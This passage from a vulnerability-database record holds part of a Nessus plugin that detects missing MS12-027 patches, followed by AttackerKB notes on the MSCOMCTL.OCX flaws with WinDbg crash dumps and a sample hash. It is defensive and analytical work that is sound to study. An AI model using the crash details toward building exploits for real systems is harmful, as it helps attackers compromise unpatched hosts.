script_xref(name:\"MSKB\", value:\"2658674\");\n script_xref(name:\"MSKB\", value:\"2658676\");\n script_xref(name:\"MSKB\", value:\"2658677\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2664258)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A memory corruption issue exists in Windows common controls,\nspecifically within the MSCOMCTL.TreeView, MSCOMCTL.ListView2,\nMSCOMCTL.TreeView2, and MSCOMCTL.ListView controls component of\nMSCOMCTL.OCX, due to improper sanitization of user-supplied input. An\nunauthenticated, remote attacker can exploit this issue by convincing\na user to view a specially crafted web page, resulting in the\nexecution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-027\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Office 2003, 2007 and\n2010; Office 2003 Web Components; SQL Server 2000, 2005, 2005 Express\nEdition, 2008, and 2008 R2; BizTalk Server 2002; Commerce Server 2002,\n2007, 2009, and 2009 R2; Microsoft Visual FoxPro 8.0 and 9.0; and\nVisual Basic 6.0 Runtime.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS12-027 MSCOMCTL ActiveX Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office_web_components\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sql_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:visual_basic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:visual_foxpro\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:biztalk_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:commerce_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"mssql_version.nasl\", \"commerce_server_installed.nasl\", \"biztalk_server_installed.nasl\", \"foxpro_installed.nasl\", \"office_installed.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_activex_func.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS12-027';\nkbs = make_list(\n '983807',\n '983808',\n '983809',\n '2597112',\n '2598039',\n '2598041',\n '2641426',\n '2645025',\n '2647488',\n '2647490',\n '2655547',\n '2658674',\n '2658676',\n '2658677'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Uninstall/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, 'activex_init');\n\nclsids = make_list(\n '{bdd1f04b-858b-11d1-b16a-00c0f0283628}',\n '{996BF5E0-8044-4650-ADEB-0B013914E99C}',\n '{C74190B6-8589-11d1-B16A-00C0F0283628}',\n '{9181DC5F-E07D-418A-ACA6-8EEA1ECB8E9E}'\n);\n\nactivex_report = NULL;\nvuln = 0;\n\nforeach clsid (clsids)\n{\n # Make sure the control is installed\n file = activex_get_filename(clsid:clsid);\n if (isnull(file) || !file) continue;\n\n # Get its version\n version = activex_get_fileversion(clsid:clsid);\n if (!version) version = 'unknown';\n\n if ((version != 'unknown' && ver_compare(ver:version, fix:'6.1.98.33') < 0) && activex_get_killbit(clsid:clsid) == 0)\n {\n vuln++;\n if (!isnull(activex_report)) activex_report += '\\n';\n activex_report +=\n '\\n Class identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version;\n }\n}\n\nactivex_end();\n\nanalysis_svcs_installed = !isnull(get_kb_item('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Microsoft SQL Server 2000 Analysis Services/DisplayName'));\nsql_ver_list = get_kb_list(\"mssql/installs/*/SQLVersion\");\nanalysispath = NULL;\nvfp8_installed = !isnull(get_kb_item('SMB/VFP8.0/path'));\nvfp9_installed = !isnull(get_kb_item('SMB/VFP9.0/path'));\ncommerce_edition = get_kb_item('SMB/commerce_server/productname');\nvb6_installed = FALSE;\noffice_version = hotfix_check_office_version();\nowc2003_installed = FALSE;\n\nbiztalk_editions = make_list();\nbiztalk_installs = get_installs(app_name:\"BizTalk Server\");\nif (!empty_or_null(biztalk_installs[1]))\n{\n foreach biztalk_install (biztalk_installs[1])\n biztalk_editions = make_list(biztalk_editions, biztalk_install['Product Name']);\n}\n\nuninst_array = get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName');\n\nforeach item (keys(uninst_array))\n{\n name = uninst_array[item];\n\n if (name == 'Microsoft Office 2003 Web Components')\n {\n # determine if this is an 11.x or a 12.x\n ver_key = item - \"DisplayName\";\n ver_key += \"DisplayVersion\";\n owc_ver = get_kb_item_or_exit(ver_key);\n\n if (\n # OWC 2003 SP3 (11.0.8173.0)\n owc_ver =~ \"^11\\.\" &&\n ver_compare(ver:owc_ver, fix:'11.0.8173.0', strict:FALSE) >= 0\n )\n owc2003_installed = TRUE;\n else if (\n # OWC 2003 for 2007 SP2 (12.0.6425.1000)\n # OWC 2003 for 2007 SP3 (12.0.6607.1000); note this\n # branch is vuln and there's no need for an upper\n # boundary until (and if) an SP4 is released.\n owc_ver =~ \"^12\\.\" &&\n ver_compare(ver:owc_ver, fix:'12.0.6425.1000', strict:FALSE) >= 0\n )\n owc2003_for_office2007_installed = TRUE;\n\n break;\n }\n}\n\nif (vuln > 0 || analysis_svcs_installed)\n{\n registry_init();\n hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n # If the ActiveX stuff looks unpatched, try to determine which KBs are missing\n if (vuln > 0)\n {\n if (!isnull(get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\VisualStudio\\6.0\\Setup\\Microsoft Visual Basic\\ProductDir\")))\n vb6_installed = TRUE;\n }\n\n # determine if 32 or 64-bit office is installed. this value is reportedly whenever office 2010 is installed, even if outlook is not installed\n if (office_version['14.0'])\n office_bitness = get_registry_value(handle:hklm, item:\"Software\\Microsoft\\Office\\14.0\\Outlook\\Bitness\");\n\n # get the SQL Server 200 Analysis Services path if it looks like it's installed\n if (analysis_svcs_installed)\n {\n analysispath = get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL Server 2000 Analysis Services\\InstallLocation\");\n\n if (analysispath)\n analysispath += \"\\bin\";\n }\n\n RegCloseKey(handle:hklm);\n close_registry();\n}\n\nprod_info = NULL;\n\nif (vuln)\n{\n activex_report = 'The following vulnerable controls do not have the kill bit set :\\n' + activex_report;\n prod_info = NULL;\n\n if (office_version['11.0'] || owc2003_installed)\n {\n flag = TRUE;\n if (office_version['11.0'])\n {\n sp = get_kb_item(\"SMB/Office/2003/SP\");\n if (!isnull(sp) && sp < 3) flag = FALSE; # < SP3 not reported\n }\n\n if (flag)\n {\n # KB923618 is Office 2003 SP3. KB2597112 will fail to install unless it's present, though it\n # doesn't make it clear that the failure is due to a lack of SP3\n prod_info +=\n '\\n\\nProduct : Office 2003 / Office 2003 Web components' +\n '\\nMissing update : KB2597112 (prerequisite: KB923618)';\n hotfix_add_report(bulletin:bulletin, kb:'2597112');\n }\n }\n if (office_version['12.0'] || owc2003_for_office2007_installed)\n {\n # If Office 2003 Web Components is ver. 12.x a different KB applies\n prod_info +=\n '\\n\\nProduct : Office 2007 / Office 2003 Web Components' +\n '\\nMissing update : KB2598041 (prerequisite: KB937961)';\n hotfix_add_report(bulletin:bulletin, kb:'2598041');\n }\n if (office_version['14.0'] && office_bitness != 'x64')\n {\n prod_info +=\n '\\n\\nProduct : Office 2010' +\n '\\nMissing update : KB2598039';\n hotfix_add_report(bulletin:bulletin, kb:'2598039');\n }\n if (vfp8_installed)\n {\n prod_info +=\n '\\n\\nProduct : Visual FoxPro 8.0' +\n '\\nMissing update : KB2647488';\n hotfix_add_report(bulletin:bulletin, kb:'2647488');\n }\n if (vfp9_installed)\n {\n prod_info +=\n '\\n\\nProduct : Visual FoxPro 9.0' +\n '\\nMissing update : KB2647490';\n hotfix_add_report(bulletin:bulletin, kb:'2647490');\n }\n if (vb6_installed)\n {\n # KB290887 is VB 6.0 Runtime SP6\n prod_info +=\n '\\n\\nProduct : Visual Basic 6.0 Runtime' +\n '\\nMissing update : KB2641426 (prerequisite: KB290887)';\n hotfix_add_report(bulletin:bulletin, kb:'2641426');\n }\n if ('2009 R2' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2009 R2' +\n '\\nMissing update : KB2658676';\n hotfix_add_report(bulletin:bulletin, kb:'2658676');\n }\n else if ('2009' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2009' +\n '\\nMissing update : KB2655547';\n hotfix_add_report(bulletin:bulletin, kb:'2655547');\n }\n if ('2007' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2007' +\n '\\nMissing update : KB2658677';\n hotfix_add_report(bulletin:bulletin, kb:'2658677');\n }\n if ('2002' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2002' +\n '\\nMissing update : KB2658674';\n hotfix_add_report(bulletin:bulletin, kb:'2658674');\n }\n if (max_index(biztalk_editions) > 0)\n {\n foreach biztalk_edition (biztalk_editions)\n {\n if ('2002' >< biztalk_edition)\n {\n prod_info +=\n '\\n\\nProduct : BizTalk Server 2002' +\n '\\nMissing update : KB2645025';\n hotfix_add_report(bulletin:bulletin, kb:'2645025');\n }\n }\n }\n}\n\n# the only other things to check are sql server 2000 and sql server 2000 analysis services.\n# if neither are installed and the activex stuff is not vulnerable, there's no need to do any further testing\nif (vuln == 0 && isnull(analysispath) && isnull(sql_ver_list)) exit(0, 'The host is not affected.');\n\nif (!is_accessible_share()) exit(1, 'is_accessible_share() failed.');\n\n# SQL Server 2000 Analysis Services\nif (\n analysispath &&\n hotfix_is_vulnerable(path:analysispath, file:\"Msmdadin.dll\", version:\"8.0.0.2302\", min_version:\"8.0.0.0\", bulletin:bulletin, kb:\"983807\")\n)\n{\n vuln++;\n\n if (!isnull(activex_report))\n {\n prod_info +=\n '\\n\\nProduct : SQL Server 2000 Analysis Services' +\n '\\nMissing update : KB983807';\n }\n}\n\nforeach item (keys(sql_ver_list))\n{\n item -= 'mssql/installs/';\n item -= '/SQLVersion';\n sqlpath = item;\n\n share = hotfix_path2share(path:sqlpath);\n if (!is_accessible_share(share:share)) continue;\n\n # SQL Server 2000\n # GDR\n if (hotfix_is_vulnerable(path:sqlpath, file:\"Sqlservr.exe\", version:\"2000.80.2065.0\", min_version:\"2000.80.2000.0\", bulletin:bulletin, kb:\"983808\"))\n {\n vuln++;\n\n if (!isnull(activex_report))\n {\n prod_info +=\n '\\n\\nProduct : SQL Server 2000' +\n '\\nMissing update : KB983808';\n }\n }\n # QFE\n else if(hotfix_is_vulnerable(path:sqlpath, file:\"Sqlservr.exe\", version:\"2000.80.2301.0\", min_version:\"2000.80.2100.0\", bulletin:bulletin, kb:\"983809\"))\n {\n vuln++;\n\n if (!isnull(activex_report))\n {\n prod_info +=\n '\\n\\nProduct : SQL Server 2000' +\n '\\nMissing update : KB983809';\n }\n }\n}\n\nif (vuln)\n{\n if (isnull(prod_info)) exit(0, \"None of the Microsoft KBs applies even though at least one of the controls is in use, possibly from a third-party application.\");\n\n if (!isnull(activex_report))\n {\n activex_report +=\n '\\n\\nNessus determined these controls are being used by the following applications :' +\n prod_info;\n\n if (hotfix_get_report())\n hotfix_add_report('\\n' + activex_report, bulletin:bulletin);\n else\n hotfix_add_report(activex_report, bulletin:bulletin);\n }\n\n set_kb_item(name:'SMB/Missing/' + bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-12-16T17:55:49", "description": "The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or \u00a9 .rtf file that triggers \u201csystem state\u201d corruption, as exploited in the wild in April 2012, aka \u201cMSCOMCTL.OCX RCE Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:46pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 \n\n * Associated Malware: Dridex \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133i>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133j>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133k>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133l>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133n>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133o>\n\n**dmelcher5151** at April 15, 2020 4:17pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 \n\n * Associated Malware: Dridex \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133i>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133j>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133k>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133l>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133n>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133o>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "attackerkb", "title": "CVE-2012-0158", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2021-07-27T00:00:00", "id": "AKB:B7C679E9-6ECB-4663-BF1E-330295E69CC4", "href": "https://attackerkb.com/topics/WPlLOOTkVi/cve-2012-0158", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-07T23:07:13", "description": "The TabStrip ActiveX control in the Common Controls in MSCOMCTL.OCX in Microsoft Office 2003 SP3, Office 2003 Web Components SP3, Office 2007 SP2 and SP3, Office 2010 SP1, SQL Server 2000 SP4, SQL Server 2005 SP4, SQL Server 2008 SP2, SP3, R2, R2 SP1, and R2 SP2, Commerce Server 2002 SP4, Commerce Server 2007 SP2, Commerce Server 2009 Gold and R2, Host Integration Server 2004 SP1, Visual FoxPro 8.0 SP1, Visual FoxPro 9.0 SP2, and Visual Basic 6.0 Runtime allows remote attackers to execute arbitrary code via a crafted (1) document or (2) web page that triggers system-state corruption, aka \u201cMSCOMCTL.OCX RCE Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\nTo trigger this:\n\n 1. Open the poc with Microsoft Word 2003 \n\n 2. Close Microsoft Word, that\u2019s when the crash is triggered. \n\n \n \n 0:000> r\n eax=056ef534 ebx=00000000 ecx=00000000 edx=02ac0007 esi=0571c18c edi=00000000\n eip=2758fce3 esp=0012e348 ebp=0012e3f4 iopl=0 nv up ei pl nz ac po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210212\n MSCOMCTL!DllGetClassObject+0x8f9f:\n 2758fce3 ff5108 call dword ptr [ecx+8] ds:0023:00000008=????????\n 0:000> k\n ChildEBP RetAddr\n WARNING: Stack unwind information not available. Following frames may be wrong.\n 0012e3f4 650cd2e2 MSCOMCTL!DllGetClassObject+0x8f9f\n 0012e40c 650cd052 VBE6!rtcSendKeys+0x1d442\n 00000000 00000000 VBE6!rtcSendKeys+0x1d1b2\n \n MSCOMCTL!DllGetClassObject+0x8f91:\n 2758fcd5 57 push edi\n 2758fcd6 8b7828 mov edi,dword ptr [eax+28h]\n 2758fcd9 8b481c mov ecx,dword ptr [eax+1Ch]\n 2758fcdc 895848 mov dword ptr [eax+48h],ebx\n 2758fcdf 83c01c add eax,1Ch\n 2758fce2 50 push eax\n 2758fce3 ff5108 call dword ptr [ecx+8]\n \n 0:000> dc eax\n 056faeb4 00000000 00000000 00000000 00000000 ................\n 056faec4 31005c00 00000000 693f3800 44001029 .\\.1.....8?i)..D\n 056faed4 4d55434f 00317e45 03004400 00000000 OCUME~1..D......\n 056faee4 3c3f37be eb4118bd 000014a6 6f004400 .7?<..A......D.o\n 056faef4 75006300 65006d00 74006e00 20007300 .c.u.m.e.n.t.s.\n 056faf04 6e006100 20006400 65005300 74007400 .a.n.d. .S.e.t.t\n 056faf14 6e006900 73006700 18000000 00000000 .i.n.g.s........\n 056faf24 00000000 00130010 010c017a 0018e920 ........z... ...\n \n\nNote: \nThis crash is different than CVE-2012-0158, despite the fact they both target the same component. \nCVE-0158 is due to a memcpy call, and then retn to the user-controlled stack. However, this PoC \nleverages from a CALL [ECX+8] call.\n\n * Using samples provided by nex \n\n\n071cb2398e5b6ad9e965c4191443227166861129eb4aca6fc1fc647b85eb91d6\n\nOffice 2003 crash:\n \n \n 0:004> sxe ld mscomctl\n 0:004> g\n ModLoad: 27580000 27685000 C:\\WINDOWS\\system32\\MSCOMCTL.OCX\n eax=00000000 ebx=00000000 ecx=02bd0000 edx=7c90e4f4 esi=00000000 edi=00000000\n eip=7c90e4f4 esp=0011fe58 ebp=0011ff4c iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\n ntdll!KiFastSystemCallRet:\n 7c90e4f4 c3 ret\n 0:000> u 2758fce3\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\WINDOWS\\system32\\MSCOMCTL.OCX -\n MSCOMCTL!DllGetClassObject+0x8f9f:\n 2758fce3 ff5108 call dword ptr [ecx+8]\n 2758fce6 3bfb cmp edi,ebx\n 2758fce8 8bc7 mov eax,edi\n 2758fcea 75ea jne MSCOMCTL!DllGetClassObject+0x8f92 (2758fcd6)\n 2758fcec 5f pop edi\n 2758fced ebd1 jmp MSCOMCTL!DllGetClassObject+0x8f7c (2758fcc0)\n 2758fcef 56 push esi\n 2758fcf0 57 push edi\n 0:000> bp 2758fce3\n 0:000> g\n Breakpoint 0 hit\n eax=01d028a4 ebx=00000000 ecx=2759e3e8 edx=fffffd37 esi=00211ca4 edi=00000000\n eip=2758fce3 esp=001213f8 ebp=00121434 iopl=0 nv up ei pl nz ac po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212\n MSCOMCTL!DllGetClassObject+0x8f9f:\n 2758fce3 ff5108 call dword ptr [ecx+8] ds:0023:2759e3f0=a0255827\n \n\nAnother crash, with interesting stack??\n \n \n 0:000> kb\n ChildEBP RetAddr Args to Child\n WARNING: Stack unwind information not available. Following frames may be wrong.\n 00125fb8 30e5982d 01ee0010 3144c8a5 01ee0070 mso!Ordinal2669+0x5f\n 00125fe0 31443f75 01ee0070 00010000 001260d0 mso!Ordinal2669+0x18\n 00126000 311a5a49 01ee0010 001260d0 012d0920 mso!Ordinal530+0x352\n 00126020 311a5f47 001260d0 01c0687c 012d075c mso!Ordinal2690+0x1ac\n 0012603c 306063d0 012d0920 001260d0 30161ba0 mso!Ordinal2690+0x6aa\n 00126058 30161a59 001260b0 00000000 00000000 WINWORD!wdCommandDispatch+0x1d695\n 0012608c 30609242 001260b0 000000d2 00a20394 WINWORD+0x161a59\n 001261b0 7c80ae80 30c90000 00000000 30c90000 WINWORD!wdCommandDispatch+0x20507\n 0012622c 7c80ae6e 00126254 7c80ae80 30c90000 kernel32!GetProcAddress+0x5b\n 00126254 00126244 30c90000 0012f904 30ed90c6 kernel32!GetProcAddress+0x43\n 0012626c 30e59897 30e5982d 00a20178 30e5979a 0x126244 <====\n 00126270 30e5982d 00a20178 30e5979a 00a353a4 mso!Ordinal2669+0x82\n 00126278 30e5979a 00a353a4 000000d8 300d9800 mso!Ordinal2669+0x18\n 00126294 3018c671 00000001 000000d8 000000c8 mso!Ordinal2402+0x13\n 001262ac 3060295c 00000000 00000003 00a20178 WINWORD+0x18c671\n 001262d4 3060958f 30609596 00126308 00000000 WINWORD!wdCommandDispatch+0x19c21\n 00126338 304c7d41 01c05c78 00000001 00000000 WINWORD!wdCommandDispatch+0x20854\n 00126354 3003caf0 00000003 00000001 00000001 WINWORD+0x4c7d41\n 00000000 00000000 00000000 00000000 00000000 WINWORD+0x3caf0\n \n\nOffice 2007 crash\n \n \n Microsoft (R) Windows Debugger Version 6.2.8400.0 X86\n Copyright (c) Microsoft Corporation. All rights reserved.\n \n *** wait with pending attach\n Symbol search path is: *** Invalid ***\n ****************************************************************************\n * Symbol loading may be unreliable without a symbol search path. *\n * Use .symfix to have the debugger choose a symbol path. *\n * After setting your symbol path, use .reload to refresh symbol locations. *\n ****************************************************************************\n Executable search path is:\n ModLoad: 30000000 30057000 C:\\Program Files\\Microsoft Office\\Office12\\WINWORD.EXE\n ModLoad: 7c900000 7c9af000 C:\\WINDOWS\\system32\\ntdll.dll\n ModLoad: 7c800000 7c8f6000 C:\\WINDOWS\\system32\\kernel32.dll\n ModLoad: 78130000 781cb000 C:\\WINDOWS\\WinSxS\\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.42_x-ww_0de06acd\\MSVCR80.dll\n ModLoad: 77c10000 77c68000 C:\\WINDOWS\\system32\\msvcrt.dll\n ModLoad: 31240000 322ec000 C:\\Program Files\\Microsoft Office\\Office12\\wwlib.dll\n ModLoad: 77dd0000 77e6b000 C:\\WINDOWS\\system32\\ADVAPI32.dll\n ModLoad: 77e70000 77f02000 C:\\WINDOWS\\system32\\RPCRT4.dll\n ModLoad: 77fe0000 77ff1000 C:\\WINDOWS\\system32\\Secur32.dll\n ModLoad: 77f10000 77f59000 C:\\WINDOWS\\system32\\GDI32.dll\n ModLoad: 7e410000 7e4a1000 C:\\WINDOWS\\system32\\USER32.dll\n ModLoad: 774e0000 7761d000 C:\\WINDOWS\\system32\\ole32.dll\n ModLoad: 3a9d0000 3b750000 C:\\Program Files\\Microsoft Office\\Office12\\oart.dll\n ModLoad: 32600000 33618000 C:\\Program Files\\Common Files\\Microsoft Shared\\office12\\mso.dll\n ModLoad: 3fde0000 40221000 C:\\WINDOWS\\system32\\msi.dll\n ModLoad: 33d00000 33dd7000 C:\\Program Files\\Microsoft Office\\Office12\\1033\\wwintl.dll\n ModLoad: 773d0000 774d3000 C:\\WINDOWS\\WinSxS\\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\\Comctl32.dll\n ModLoad: 77f60000 77fd6000 C:\\WINDOWS\\system32\\SHLWAPI.dll\n ModLoad: 74720000 7476c000 C:\\WINDOWS\\system32\\MSCTF.dll\n ModLoad: 00cc0000 01314000 C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSORES.DLL\n ModLoad: 6bdc0000 6be7a000 C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSPTLS.DLL\n ModLoad: 7c9c0000 7d1d7000 C:\\WINDOWS\\system32\\SHELL32.DLL\n ModLoad: 5d090000 5d12a000 C:\\WINDOWS\\system32\\comctl32.dll\n ModLoad: 01bf0000 025cd000 C:\\Program Files\\Common Files\\Microsoft Shared\\office12\\1033\\MSOINTL.DLL\n ModLoad: 79000000 7904a000 C:\\WINDOWS\\system32\\mscoree.dll\n ModLoad: 603b0000 60416000 C:\\WINDOWS\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\n ModLoad: 77c00000 77c08000 C:\\WINDOWS\\system32\\VERSION.DLL\n ModLoad: 73000000 73026000 C:\\WINDOWS\\system32\\Winspool.DRV\n ModLoad: 7e660000 7e715000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\PS5UI.DLL\n ModLoad: 77120000 771ab000 C:\\WINDOWS\\system32\\OLEAUT32.dll\n ModLoad: 5ad70000 5ada8000 C:\\WINDOWS\\system32\\UxTheme.DLL\n ModLoad: 3a780000 3a889000 C:\\Program Files\\Common Files\\Microsoft Shared\\office12\\riched20.dll\n ModLoad: 76fd0000 7704f000 C:\\WINDOWS\\system32\\CLBCATQ.DLL\n ModLoad: 77050000 77115000 C:\\WINDOWS\\system32\\COMRes.dll\n ModLoad: 78800000 7895c000 C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE11\\msxml5.dll\n ModLoad: 77920000 77a13000 C:\\WINDOWS\\system32\\SETUPAPI.dll\n ModLoad: 02dd0000 03095000 C:\\WINDOWS\\system32\\xpsp2res.dll\n ModLoad: 3bd10000 3bea5000 C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\OGL.DLL\n ModLoad: 76f50000 76f58000 C:\\WINDOWS\\system32\\WTSAPI32.DLL\n ModLoad: 76360000 76370000 C:\\WINDOWS\\system32\\WINSTA.dll\n ModLoad: 5b860000 5b8b5000 C:\\WINDOWS\\system32\\NETAPI32.dll\n ModLoad: 73ba0000 73bb3000 C:\\WINDOWS\\system32\\sti.dll\n ModLoad: 74ae0000 74ae7000 C:\\WINDOWS\\system32\\CFGMGR32.dll\n ModLoad: 7e1e0000 7e282000 C:\\WINDOWS\\system32\\urlmon.dll\n ModLoad: 6bd10000 6bd24000 C:\\Program Files\\Microsoft 